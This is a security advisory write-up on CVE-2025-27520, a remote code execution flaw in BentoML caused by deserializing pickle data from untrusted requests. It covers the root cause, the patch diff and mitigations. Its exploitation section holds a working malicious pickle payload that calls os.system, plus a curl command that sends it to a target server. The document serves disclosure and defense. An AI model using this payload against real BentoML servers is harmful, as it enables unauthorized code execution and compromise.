CVE-2025-27520: BentoML Remote Code Execution via Insecure Deserialization

David Wilson

Apr 4, 2025 — 5 min read

Executive Summary

CVE-2025-27520 is a critical vulnerability in BentoML, a Python library for building and serving AI applications. It allows unauthenticated attackers to execute arbitrary code on the server through insecure deserialization of untrusted data. The unsafe deserialization happens in the serde.py module and is reachable when the main server processes a request with the application/vnd.bentoml+pickle media type. The issue is fixed in BentoML version 1.4.3. The CVSS v3.1 base score is 9.8 (Critical).

Technical Details

Affected Software: BentoML
Affected Versions: >= 1.3.4, < 1.4.3
Vulnerability Type: Insecure Deserialization (CWE-502)
Attack Vector: Network
Privileges Required: None
User Interaction: None
CVSS Score: 9.8 (Critical)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Affected Component: src/_bentoml_impl/server/app.py
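
As a quick way to apply the affected range listed above, the following is a minimal sketch that checks whether the BentoML version installed in the current environment falls inside it. The helper names (parse_release, is_affected, installed_bentoml_version) are hypothetical, and the parser is a simplification that only looks at the leading MAJOR.MINOR.PATCH numbers, so pre-release or development suffixes are ignored.

```python
import re
from importlib import metadata

AFFECTED_MIN = (1, 3, 4)  # first affected release (inclusive), per the range above
FIXED_IN = (1, 4, 3)      # first fixed release (exclusive upper bound)


def parse_release(version):
    """Return the leading MAJOR.MINOR.PATCH of a version string as a tuple of ints."""
    match = re.match(r"(\d+)\.(\d+)\.(\d+)", version)
    if match is None:
        raise ValueError(f"unrecognized version string: {version!r}")
    return tuple(int(part) for part in match.groups())


def is_affected(version):
    """True if the version lies in the range >= 1.3.4, < 1.4.3."""
    return AFFECTED_MIN <= parse_release(version) < FIXED_IN


def installed_bentoml_version():
    """Return the installed bentoml version string, or None if it is not installed."""
    try:
        return metadata.version("bentoml")
    except metadata.PackageNotFoundError:
        return None


if __name__ == "__main__":
    version = installed_bentoml_version()
    if version is None:
        print("bentoml is not installed in this environment")
    elif is_affected(version):
        print(f"bentoml {version} is in the affected range; upgrade to 1.4.3 or later")
    else:
        print(f"bentoml {version} is outside the affected range")
```

Tuple comparison keeps the sketch free of third-party dependencies; a stricter check would use a full version parser.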

The vulnerability stems from the acceptance of application/vnd.bentoml+pickle as a valid media type for incoming requests to the main BentoML server. Python's pickle module is known to be inherently unsafe when used to deserialize data from untrusted sources. An attacker can craft a malicious pickle payload that, when deserialized by the BentoML server, executes arbitrary code.

Root Cause Analysis

The root cause of CVE-2025-27520 is the use of Python's pickle module on attacker-controlled request bodies in BentoML's request handling logic. The pickle module serializes and deserializes arbitrary Python objects, and a pickle stream can name any importable callable together with the arguments to call it with, for example through an object's __reduce__ method. Deserializing data from an untrusted source with pickle can therefore lead to arbitrary code execution.
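
The mechanism can be seen with a harmless callable. The sketch below is illustrative only and is not BentoML code: the Demo class is hypothetical, and the built-in sorted stands in for whatever callable an attacker would choose.

```python
import pickle


class Demo:
    """Hypothetical class whose pickle form is a call to sorted()."""

    def __reduce__(self):
        # (callable, args): the unpickler calls sorted([3, 1, 2]) during loads()
        return (sorted, ([3, 1, 2],))


blob = pickle.dumps(Demo())
result = pickle.loads(blob)

# loads() returned the result of the call, not a Demo instance
print(type(result).__name__, result)  # prints: list [1, 2, 3]
```

The call happens inside pickle.loads itself, before the application has any chance to inspect the resulting object.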

The vulnerable code is located in src/_bentoml_impl/server/app.py. Prior to version 1.4.3, the main server accepted requests whose Content-Type header was set to application/vnd.bentoml+pickle and did nothing to reject or restrict them. An attacker could therefore send a malicious pickle payload that the server would deserialize, leading to code execution.

The following code snippet illustrates the vulnerable logic before the patch:

# src/_bentoml_impl/server/app.py (Vulnerable Version)

async def api_endpoint(self, name: str, request: Request) -> Response:
    from _bentoml_sdk.io_models import IORootModel
    from bentoml._internal.utils import get_original_func
    from bentoml._internal.utils.http import set_cookies

    from ..serde import ALL_SERDE

    media_type = request.headers.get("Content-Type", "application/json")
    media_type = media_type.split(";")[0].strip()

    # Vulnerable: nothing here rejects application/vnd.bentoml+pickle on the
    # main server, so a pickle request body goes on to be deserialized.

    method = self.service.apis[name]
    func = getattr(self._service_instance, name).local
    ctx = self.service.context

In this vulnerable version, there's no explicit check to prevent the application/vnd.bentoml+pickle media type from being processed on the main server. This allows an attacker to send a crafted pickle payload, leading to arbitrary code execution.

Patch Analysis

The fix for CVE-2025-27520 involves adding a check to explicitly disallow the application/vnd.bentoml+pickle media type on the main BentoML server. This prevents attackers from sending malicious pickle payloads to the server and achieving code execution.

The following diff shows the changes made in src/_bentoml_impl/server/app.py to address the vulnerability:

--- a/src/_bentoml_impl/server/app.py
+++ b/src/_bentoml_impl/server/app.py
@@ -641,12 +641,19 @@ async def api_endpoint(self, name: str, request: Request) -> Response:
         from _bentoml_sdk.io_models import IORootModel
         from bentoml._internal.utils import get_original_func
         from bentoml._internal.utils.http import set_cookies
+        from http import HTTPStatus
 
         from ..serde import ALL_SERDE
 
         media_type = request.headers.get("Content-Type", "application/json")
         media_type = media_type.split(";")[0].strip()
 
+        if self.is_main and media_type == "application/vnd.bentoml+pickle":
+            raise BentoMLException(
+                "application/vnd.bentoml+pickle is not allowed in main server",
+                error_code=HTTPStatus.UNSUPPORTED_MEDIA_TYPE,
+            )
+
         method = self.service.apis[name]
         func = getattr(self._service_instance, name).local
         ctx = self.service.context

Explanation of the Patch:

Import HTTPStatus: The patch imports the HTTPStatus enum from the http module. This is used to return a proper HTTP error code when the disallowed media type is encountered.
Check for application/vnd.bentoml+pickle: The patch adds a conditional statement that checks if the request's Content-Type is application/vnd.bentoml+pickle and if the current instance is the main server (self.is_main).
Raise BentoMLException: If both conditions are true, the code raises a BentoMLException with an error message indicating that the media type is not allowed on the main server. The error_code is set to HTTPStatus.UNSUPPORTED_MEDIA_TYPE (415), which is the appropriate HTTP status code for this scenario.

This patch effectively prevents the insecure deserialization vulnerability by rejecting requests with the application/vnd.bentoml+pickle media type on the main server, thus mitigating the risk of arbitrary code execution.
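
The logic of the check can be sketched in isolation. This is a standalone illustration, not BentoML's code: MediaTypeNotAllowed and check_media_type are hypothetical names, and the is_main argument stands in for the self.is_main attribute seen in the diff.

```python
from http import HTTPStatus

PICKLE_MEDIA_TYPE = "application/vnd.bentoml+pickle"


class MediaTypeNotAllowed(Exception):
    """Hypothetical stand-in for the exception raised by the patched server."""

    def __init__(self, message, status):
        super().__init__(message)
        self.status = status


def check_media_type(content_type_header, is_main):
    """Normalize the Content-Type header and reject pickle on the main server."""
    # Same normalization as in the diff: drop parameters such as "; charset=..."
    media_type = content_type_header.split(";")[0].strip()
    if is_main and media_type == PICKLE_MEDIA_TYPE:
        raise MediaTypeNotAllowed(
            f"{PICKLE_MEDIA_TYPE} is not allowed in main server",
            HTTPStatus.UNSUPPORTED_MEDIA_TYPE,
        )
    return media_type
```

For example, check_media_type("application/json", is_main=True) returns "application/json", while the pickle media type raises an error carrying status 415 when is_main is true.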

Exploitation Techniques

An attacker can exploit this vulnerability by sending a crafted HTTP request to the BentoML server with the Content-Type header set to application/vnd.bentoml+pickle and a malicious pickle payload in the request body.

Here's a conceptual outline of the exploit:

Craft a Malicious Pickle Payload: The attacker creates a pickle payload that executes arbitrary code when deserialized, typically by defining a __reduce__ method that returns a callable such as os.system or subprocess.Popen together with its arguments.

A simple example of a malicious pickle payload:
```
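# generate_payload.py (the script name used by the curl example)
import base64
import os
import pickle


class Exploit:
    def __reduce__(self):
        # On deserialization the unpickler calls os.system('touch /tmp/pwned')
        return (os.system, ('touch /tmp/pwned',))


serialized_payload = pickle.dumps(Exploit())
encoded_payload = base64.b64encode(serialized_payload).decode()

# Print only the payload so that $(python generate_payload.py) expands to it
print(encoded_payload)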
```
This payload, when deserialized, will execute the command touch /tmp/pwned on the server.
Send the Malicious Request: The attacker sends an HTTP POST request to a BentoML API endpoint with the Content-Type header set to application/vnd.bentoml+pickle and the base64-encoded pickle payload as the request body.

Example using curl:
```
curl -X POST -H "Content-Type: application/vnd.bentoml+pickle" --data "$(python generate_payload.py)" http://<target_ip>:<port>/<api_endpoint>
```
Replace <target_ip>, <port>, and <api_endpoint> with the appropriate values for the target BentoML server.
Server Deserializes and Executes Code: The BentoML server, if running a vulnerable version, will deserialize the pickle payload, leading to the execution of the attacker's arbitrary code. In this example, it would create a file named /tmp/pwned on the server.
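
For contrast with the steps above, the following sketch shows why a payload of this kind depends on the unpickler being allowed to resolve globals. It follows the "restricting globals" pattern described in the Python pickle documentation. The names NoGlobalsUnpickler and restricted_loads are hypothetical, and this is not how BentoML fixed the issue. It reduces the attack surface but is not a complete defense, so avoiding pickle for untrusted input remains the safer choice.

```python
import io
import pickle


class NoGlobalsUnpickler(pickle.Unpickler):
    """Unpickler that refuses every global lookup (classes, functions, modules)."""

    def find_class(self, module, name):
        # A __reduce__-based payload has to resolve a callable such as os.system here
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data):
    """Like pickle.loads, but only plain built-in containers and scalars can load."""
    return NoGlobalsUnpickler(io.BytesIO(data)).load()
```

Plain data such as dicts, lists, strings, and numbers still round-trips through restricted_loads, while any stream that references a callable fails with pickle.UnpicklingError before the call is made.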

Real-World Impact:

Successful exploitation of this vulnerability can have severe consequences, including:

Remote Code Execution: Attackers can execute arbitrary code on the server, potentially gaining complete control of the system.
Data Breach: Attackers can access sensitive data stored on the server, leading to data breaches and privacy violations.
Denial of Service: Attackers can crash the server or disrupt its normal operation, leading to denial of service.
Lateral Movement: If the compromised server has access to other systems on the network, attackers can use it as a stepping stone to compromise other systems.

Disclaimer: The exploit above is a simplified, made-up example for educational purposes only. Real-world exploits may be more complex and sophisticated.

Mitigation Strategies

The following measures reduce the risk from CVE-2025-27520:

Upgrade to BentoML 1.4.3 or later: The most effective mitigation is to upgrade to BentoML version 1.4.3 or later, which includes the fix for this vulnerability.
Network Segmentation: Implement network segmentation to limit the impact of a successful attack. This can help prevent attackers from moving laterally to other systems on the network.
Web Application Firewall (WAF): Deploy a WAF to filter out malicious requests. A WAF can be configured to block requests with the application/vnd.bentoml+pickle media type or to inspect the request body for malicious pickle payloads.
Input Validation: Accept only the media types the service actually needs, and never deserialize pickle data received from untrusted clients. This helps prevent attackers from injecting malicious payloads.
Principle of Least Privilege: Grant users and processes only the minimum privileges necessary to perform their tasks. This can help limit the impact of a successful attack.
Monitoring and Logging: Implement comprehensive monitoring and logging to detect and respond to suspicious activity. This can help identify and contain attacks before they cause significant damage.
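
Where an immediate upgrade is not possible, the media-type filtering described for a WAF can also be approximated in front of the application. The following is a minimal sketch of a generic ASGI middleware that answers 415 to any HTTP request carrying the pickle media type. BlockPickleMiddleware is a hypothetical name, and how to mount it in front of a BentoML service depends on the deployment and is not shown. Note that it blocks the media type for every caller, which may break traffic that legitimately relies on it.

```python
PICKLE_MEDIA_TYPE = b"application/vnd.bentoml+pickle"


class BlockPickleMiddleware:
    """ASGI middleware that rejects pickle-typed HTTP requests with 415."""

    def __init__(self, app):
        self.app = app  # the wrapped ASGI application

    async def __call__(self, scope, receive, send):
        if scope["type"] == "http":
            # ASGI delivers headers as (name, value) byte pairs with lowercase names
            headers = dict(scope.get("headers", []))
            content_type = headers.get(b"content-type", b"")
            media_type = content_type.split(b";")[0].strip().lower()
            if media_type == PICKLE_MEDIA_TYPE:
                await send({
                    "type": "http.response.start",
                    "status": 415,
                    "headers": [(b"content-type", b"text/plain")],
                })
                await send({
                    "type": "http.response.body",
                    "body": b"unsupported media type",
                })
                return  # never reaches the wrapped application
        await self.app(scope, receive, send)
```

The comparison is done on the lowercased media type because media types are case-insensitive; that choice is an addition of this sketch, not something taken from the patch.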

Timeline of Discovery and Disclosure

Vulnerability Discovered: Unknown
Vulnerability Reported: Unknown
Patch Released: BentoML 1.4.3
CVE Assigned: CVE-2025-27520
Public Disclosure: 2025-04-04

References

GitHub Security Advisory: https://github.com/bentoml/BentoML/security/advisories/GHSA-33xw-247w-6hmc
Commit with Fix: https://github.com/bentoml/BentoML/commit/b35f4f4fcc53a8c3fe8ed9c18a013fe0a728e194
